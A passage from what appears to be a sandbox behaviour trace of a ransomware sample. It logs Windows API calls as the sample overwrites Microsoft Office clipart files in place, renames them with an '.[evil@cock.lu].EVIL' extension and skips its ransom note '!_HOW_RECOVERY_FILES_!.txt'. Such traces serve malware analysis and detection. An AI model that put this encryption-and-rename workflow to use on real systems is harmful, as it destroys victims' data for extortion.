lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a6c0, lpOverlapped=0x0) returned 1 [0167.350] CloseHandle (hObject=0x1a8) returned 1 [0167.350] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.350] __uncaught_exception () returned 0x84b1160800 [0167.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.350] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02753u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02753u.bmp.[evil@cock.lu].evil")) returned 1 [0167.351] ??_V@YAXPEAX@Z () returned 0x1 [0167.355] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP", dwFileAttributes=0x200) returned 0 [0167.355] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.355] wcsstr (_Str="PH02754U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.355] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP") returned 69 [0167.355] wcscmp (_String1="PH02754U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.355] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02754U.BMP") returned 0x0 [0167.355] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP") returned 0x45 [0167.355] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.357] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a7d8, lpOverlapped=0x0) returned 1 [0167.360] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.360] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.360] _errno () returned 0x84b1160840 [0167.360] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.360] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1a7e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a7e0, lpOverlapped=0x0) returned 1 [0167.361] CloseHandle (hObject=0x1a8) returned 1 [0167.361] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.361] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.361] __uncaught_exception () returned 0x84b1160800 [0167.361] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.361] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02754u.bmp.[evil@cock.lu].evil")) returned 1 [0167.362] ??_V@YAXPEAX@Z () returned 0x1 [0167.366] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02754U.BMP", dwFileAttributes=0x200) returned 0 [0167.366] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.366] wcsstr (_Str="PH02755U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.366] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP") returned 69 [0167.366] wcscmp (_String1="PH02755U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.366] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02755U.BMP") returned 0x0 [0167.366] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP") returned 0x45 [0167.366] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02755u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.369] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a7d8, lpOverlapped=0x0) returned 1 [0167.372] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.372] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.373] _errno () returned 0x84b1160840 [0167.373] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.373] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1a7e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1a7e0, lpOverlapped=0x0) returned 1 [0167.373] CloseHandle (hObject=0x1a8) returned 1 [0167.373] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.373] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.374] __uncaught_exception () returned 0x84b1160800 [0167.374] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.374] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02755u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02755u.bmp.[evil@cock.lu].evil")) returned 1 [0167.375] ??_V@YAXPEAX@Z () returned 0x1 [0167.378] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02755U.BMP", dwFileAttributes=0x200) returned 0 [0167.378] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.378] wcsstr (_Str="PH02756U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.379] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP") returned 69 [0167.379] wcscmp (_String1="PH02756U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.379] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02756U.BMP") returned 0x0 [0167.379] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP") returned 0x45 [0167.379] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02756u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.381] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30408, lpOverlapped=0x0) returned 1 [0167.390] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.390] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.390] _errno () returned 0x84b1160840 [0167.390] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.390] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x30420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30420, lpOverlapped=0x0) returned 1 [0167.391] CloseHandle (hObject=0x1a8) returned 1 [0167.391] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.391] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.391] __uncaught_exception () returned 0x84b1160800 [0167.391] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.392] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02756u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02756u.bmp.[evil@cock.lu].evil")) returned 1 [0167.393] ??_V@YAXPEAX@Z () returned 0x1 [0167.482] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02756U.BMP", dwFileAttributes=0x200) returned 0 [0167.482] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.482] wcsstr (_Str="PH02757U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.482] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP") returned 69 [0167.483] wcscmp (_String1="PH02757U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.483] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02757U.BMP") returned 0x0 [0167.483] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP") returned 0x45 [0167.483] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02757u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.485] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x30408, lpOverlapped=0x0) returned 1 [0167.489] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.490] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.490] _errno () returned 0x84b1160840 [0167.490] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.490] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x30420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30420, lpOverlapped=0x0) returned 1 [0167.490] CloseHandle (hObject=0x1a8) returned 1 [0167.491] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.491] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.491] __uncaught_exception () returned 0x84b1160800 [0167.491] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.491] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02757u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02757u.bmp.[evil@cock.lu].evil")) returned 1 [0167.492] ??_V@YAXPEAX@Z () returned 0x1 [0167.496] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02757U.BMP", dwFileAttributes=0x200) returned 0 [0167.496] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.496] wcsstr (_Str="PH02758U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.496] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP") returned 69 [0167.496] wcscmp (_String1="PH02758U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.496] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02758U.BMP") returned 0x0 [0167.496] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP") returned 0x45 [0167.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02758u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.499] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x307f8, lpOverlapped=0x0) returned 1 [0167.503] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.503] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.503] _errno () returned 0x84b1160840 [0167.504] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.504] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x30800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x30800, lpOverlapped=0x0) returned 1 [0167.504] CloseHandle (hObject=0x1a8) returned 1 [0167.504] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.505] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.505] __uncaught_exception () returned 0x84b1160800 [0167.505] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.505] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02758u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02758u.bmp.[evil@cock.lu].evil")) returned 1 [0167.506] ??_V@YAXPEAX@Z () returned 0x1 [0167.508] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02758U.BMP", dwFileAttributes=0x200) returned 0 [0167.509] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.509] wcsstr (_Str="PH02759J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.509] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG") returned 69 [0167.509] wcscmp (_String1="PH02759J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.509] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02759J.JPG") returned 0x0 [0167.509] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG") returned 0x45 [0167.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02759j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.511] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa0d2, lpOverlapped=0x0) returned 1 [0167.514] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.514] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.514] _errno () returned 0x84b1160840 [0167.514] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.514] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xa0e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa0e0, lpOverlapped=0x0) returned 1 [0167.514] CloseHandle (hObject=0x1a8) returned 1 [0167.514] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.514] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.514] __uncaught_exception () returned 0x84b1160800 [0167.514] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.515] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02759j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02759j.jpg.[evil@cock.lu].evil")) returned 1 [0167.515] ??_V@YAXPEAX@Z () returned 0x1 [0167.518] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02759J.JPG", dwFileAttributes=0x200) returned 0 [0167.519] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.519] wcsstr (_Str="PH02810J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.519] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG") returned 69 [0167.519] wcscmp (_String1="PH02810J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.519] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02810J.JPG") returned 0x0 [0167.519] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG") returned 0x45 [0167.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02810j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.521] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc5d7, lpOverlapped=0x0) returned 1 [0167.524] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.524] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.524] _errno () returned 0x84b1160840 [0167.525] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.525] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xc5e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc5e0, lpOverlapped=0x0) returned 1 [0167.525] CloseHandle (hObject=0x1a8) returned 1 [0167.525] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.525] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.525] __uncaught_exception () returned 0x84b1160800 [0167.525] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.526] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02810j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02810j.jpg.[evil@cock.lu].evil")) returned 1 [0167.527] ??_V@YAXPEAX@Z () returned 0x1 [0167.531] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02810J.JPG", dwFileAttributes=0x200) returned 0 [0167.531] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.531] wcsstr (_Str="PH02829J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.531] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG") returned 69 [0167.531] wcscmp (_String1="PH02829J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.531] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02829J.JPG") returned 0x0 [0167.531] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG") returned 0x45 [0167.531] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02829j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.533] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf438, lpOverlapped=0x0) returned 1 [0167.543] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.543] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.543] _errno () returned 0x84b1160840 [0167.543] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.543] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xf440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf440, lpOverlapped=0x0) returned 1 [0167.544] CloseHandle (hObject=0x1a8) returned 1 [0167.544] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02829J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.544] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: 